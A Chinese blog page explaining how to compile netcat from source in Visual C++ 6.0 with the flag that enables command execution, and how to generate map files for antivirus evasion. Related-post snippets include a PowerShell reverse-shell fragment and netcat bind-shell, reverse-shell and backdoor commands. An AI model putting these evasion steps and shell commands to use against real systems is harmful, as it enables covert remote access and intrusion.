网络安全:NC源码编译及免杀

最新推荐文章于 2024-08-19 18:23:31 发布
最新推荐文章于 2024-08-19 18:23:31 发布
阅读量326 收藏
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ctfysj/article/details/81299839
本文介绍了NC反弹工具的两种编译方法:通过vcmakefile文件编译及使用Visual C++界面进行编译。此外,还详细说明了如何设置VC以生成用于免杀的map文件,并对比了不同编译环境及链接环境的参数。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

NC反弹工具,相信大家也不陌生了吧,这里就就介绍怎么编译它,两种方式:

第一种:vc makefile文件编译

1、进入vc安装目录 执行vcvars32.bat(设置环境用的,只需要执行一次)

D:\Program Files\Microsoft Visual Studio\VC98\Bin>VCVARS32.BAT

2、进入项目目录,运行makefile

E:\TeamProgram\VisualC++6.0\nc\nc_CMD>nmake /f makefile

 

第二种:我们常用vc界面编译

设置vc 生成map文件(免杀必需文件)

VC 中,我们可以按下 Alt+F7 ,打开“Project Settings”选项页,选择 C/C++ 选项卡,并在最下面的 Project Options 里面输入:/Zd ,然后要选择 Link 选项卡,在最下面的  Project Options 里面输入: /mapinfo:lines /map:PROJECT_NAME.map 。最后按下 F7 来编译生成 EXE 可执行文件和 MAP 文件。

 

编译环境比较:

/nologo /ML /W3 /GX /O2 /D "NDEBUG" /D "WIN32" /D "_CONSOLE" /D "TELNET" /D "GAPING_SECURITY_HOLE" /YX /FD /c

 /nologo /ML /W3 /GX /O2 /D "NDEBUG" /D "WIN32" /D "_CONSOLE" /D "TELNET" /D "GAPING_SECURITY_HOLE" /Fp"Debug/nc.pch" /YX /Fo"Debug/" /Fd"Debug/" /FD /c

 /nologo /ML /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" /Fp"Release/nc.pch" /YX /Fo"Release/" /Fd"Release/" /FD /c /c

链接环境比较:

kernel32.lib user32.lib wsock32.lib winmm.lib /nologo /subsystem:console /incremental:yes /machine:I386 /out:nc.exe

kernel32.lib user32.lib wsock32.lib winmm.lib /nologo /subsystem:console /incremental:yes /pdb:"Debug/nc.pdb" /machine:I386 /out:"Debug/nc.exe"

kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /incremental:no

/pdb:"Release/nc.pdb" /machine:I386 /out:"Release/nc.exe"

 

 

NCRelease版本标准设置:

/nologo /ML /W3 /GX /O2 /D "NDEBUG" /D "WIN32" /D "_CONSOLE" /D "TELNET" /D "GAPING_SECURITY_HOLE" /Fp"Release/nc.pch" /YX /Fo"Release/" /Fd"Release/" /FD /c

----------------------------------------------------------------------------------

kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib kernel32.lib user32.lib

gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /incremental:no /pdb:"Release/nc.pdb" /machine:I386 /out:"Release/nc.exe"

2011 年度最佳源代码

try                                                 

{                                                  

    if(you.believe(it) == true ||you.believe(it) == false)

    {                                              

       I.believe(it);                                 

     }                                             

}                                                   

catch(Exception e)                                 

{                                                  

    throw new Exception("it's a miracle!")           

}                                                  

finally                                              

{                                                  

    it.justHappened();                              

}                                                   

免杀主要是过小红伞,其它的杀软忽略,在此不介绍。

Powershell工具Powercat(可以理解为nc
墨痕诉清风的博客
04-15 1122
Powershell工具Powercat(可以理解为nc
网络安全从入门到精通(特别篇I):Linux安全事件应急响应之Linux应急响应基础必备技能
HACKONE的博客
04-10 1085
awk 首先将每条日志中的IP抓出来,如日志格式被自定义过,可以 -F 定义分隔符和 print指定列;
nc超强ncNC汉化版
07-11
过了该过的软!够强! 过了该过的软!够强! 过了该过的软!够强! 过了该过的软!够强! 过了该过的软!够强!
NC 补丁源码编译
cujiaowu9180的博客
11-02 276
E:\nccode\nc56\modules\gl>d:\sun\sdk\jdk\bin\javac -verbose -classpath E:\nccode\nc56\modules\gl\lib\pubgl.jar;...
nc军刀 个人经过处理的版,防止软误报。
10-22
个人经过处理的版,防止软误报。 它本身不是病毒,偏偏有些厂商。。
Linux编译nc
mvpboss1004的博客
11-15 2429
Linux编译ncLinux自带的或通过apt-get、yum安装的nc不带-e选项,需要自己编译。wget http://ncu.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.gz tar zxvf netcat-0.7.1.tar.gz cd netcat-0.7.1 ./configure --enable-D
网络NCNC源码
02-23
下面将详细介绍网络NC源码的相关知识点。 1. **网络通信基础**: - **TCP/IP协议栈**:网络NC可能基于TCP/IP协议栈进行通信,包括应用层、传输层、网络层和数据链路层。理解这些层次如何交互对于解析源码至关重要...
【Linux自制操作系统系列】(二)实验环境安装:源码编译安装 Qemu 9.1.1 和 Bochs 2.8
m0_49236123的博客
05-13 2461
【Linux自制操作系统系列】(二)实验环境安装:源码编译安装Qemu 9.1.1 和 Bochs 2.8
【FFMpeg】源码编译
郭老二
08-07 1515
【一】使用apt命令安装 1、参考博客 https://blog.youkuaiyun.com/mandagod/article/details/52337434 2、命令步骤 sudo add-apt-repository ppa:kirillshkrogalev/ffmpeg-next sudo apt-get update sudo apt-get install ffmpeg 3、官方安装包 http://ppa.launchpad.net/kirillshkrogalev/ffmpeg-next/ubu
WEB渗透篇-Bypass-AMSI
最新发布
qq_59468567的博客
08-19 454
$stream = $client.GetStream() [byte[]]$bytes = 0..65535|%{0} $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserv
nc源码(含unix、windows版本)
08-01
大名鼎鼎的网络瑞士军刀nc源码,里面有两份,一份是unix版本的,一个是windowsNT版本的。
NC源码大全
07-29
包含各种开发项目源代码!适合与初学者,同时也可供参考,此代码很全.....
NC源码和程序附上目前最详细的使用手册和使用技巧
05-12
软件介绍: 工具名:Netcat 作者:Hobbit && Chris Wysopal 类别:开放源码 平台:Linux/BSD/Unix/Windows WINDOWS下版本号:[v1.10 NT] 参数介绍: *nc.exe -h*即可看到各参数的使用方法。 基本格式:nc [-options] hostname port[s] [ports] … nc -l -p port [options] [hostname] [port] -d 后台模式 -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, … -h 帮助信息 -i secs 延时的间隔 -l 监听模式,用于入站连接 -L 连接关闭后,仍然继续监听 -n 指定数字的IP地址,不能用hostname -o file 记录16进制的传输 -p port 本地端口号 -r 随机本地及远程端口 -s addr 本地源地址 -t 使用TELNET交互方式 -u UDP模式 -v 详细输出–用两个-v可得到更详细的内容 -w secs timeout的时间 -z 将输入输出关掉–用于扫描时 端口的表示方法可写为M-N的范围格式。 ======================================================== 基本用法: 1)连接到REMOTE主机,例子: 格式:nc -nvv 192.168.x.x 80 讲解:连到192.168.x.x的TCP80端口 2)监听LOCAL主机,例子: 格式:nc -l -p 80 讲解:监听本机的TCP80端口 3)扫描远程主机,例子: 格式:nc -nvv -w2 -z 192.168.x.x 80-445 讲解:扫描192.168.x.x的TCP80到TCP445的所有端口 4)REMOTE主机绑定SHELL,例子: 格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe 讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口 5)REMOTE主机绑定SHELL并反向连接,例子: 格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354 讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口 以上为最基本的几种用法(其实NC的用法还有很多, 当配合管道命令”|”与重定向命令””等等命令功能更强大……)。 ======================================================== 高级用法: 6)作攻击程序用,例子: 格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80 格式2:nc -nvv 192.168.x.x 80 c:log.txt 讲解:使用*-L*可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到*c:log.txt*中,如果把*>* 改为*>>*即可以追加日志 附:*c:log.txt*为日志等 9)作蜜罐用[3],例子: 格式1:nc -L -p 80 < c:honeypot.txt 格式2:type.exe c:honeypot.txt|nc -L -p 80 讲解:使用*-L*可以不停地监听某一个端口,直到ctrl+c为止,并把*c:honeypot.txt*的内容*送*入其管道中 10) 后门 victim machine: //受害者的机器 nc -l -p port -e cmd //win2000 nc -l -p port -e /bin/sh //unix,linux
nc(瑞士军刀) 程序,源码与教程
03-04
大名鼎鼎的瑞士军刀NetCat就不需要过多介绍了吧
瑞士军刀NC源码
08-01
瑞士军刀,经典之作,网络安全必备软件,源码奉上!
NC源码编译
liujiayu2的专栏
08-08 3396
NC反弹工具,相信大家也不陌生了吧,这里就就介绍怎么编译它,两种方式: 第一种:vc makefile文件编译 1、进入vc安装目录 执行vcvars32.bat(设置环境用的,只需要执行一次) D:\Program Files\Microsoft Visual Studio\VC98\Bin>VCVARS32.BAT 2、进入项目目录,运行makefile E:\TeamProgr
【Linux基础编程】nc命令
Cain Xcy的博客
07-06 779
01.文章目录 文章目录01.文章目录02.命令介绍03.命令格式04.常用选项05.参考示例5.1 启动Tcp服务端,端口号为100865.2 启动Tcp客户端连接服务器5.3 启动UDP服务端,端口号为100865.4 启动UDP客户端UDP连接服务端5.5 作为客户端工具进行端口探测5.6 扫描连续端口5.6.1 服务端执行5.6.2 客户端执行5.7 使用nc传输文件5.7.1 服务端执行5.7.2 客户端执行5.8 设置本地端口连接服务器5.9 模拟http协议首部5.10 扫描80端口5.11
nc v6的源码看懂
weixin_33754913的博客
10-28 217
看懂nc v6的源码! 碧桂园全部的正式环境的补丁都在我手里。 2015-11-18 2:33 谢谢两位一起努力的兄弟 谢谢超哥,谢谢祈冰哥,谢谢连老师,陈明大哥,谢谢龙哥,珍玉,谢谢廖生哥,谢谢林春哥,谢谢桂春,谢谢海敏,谢谢培珊,谢谢清耿,谢谢贤哥,谢谢磊哥,谢谢碧桂园总部的保安, 认识了一些人,典进,海晴,国丽,汤小洁,合玺姐,嘉慧很努力哦 还有一些暂时记不住名字 还有...
nc 源代码分析(2),流程分析
linux-0.11调试教程
04-15 2736
nc调试版.rar for windows by chenghao0511 步骤1,机器A输入d回车,机器B里面显示d。 步骤2,机器A输入d未回车!机器B里面输入ee回车,然后输入ff回车。 机器A里面回车。 里面显示一些debug()宏函数的信息。 vc6下nmake后顺利编译通过。可下载调试版,实验。     if (istty) {
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值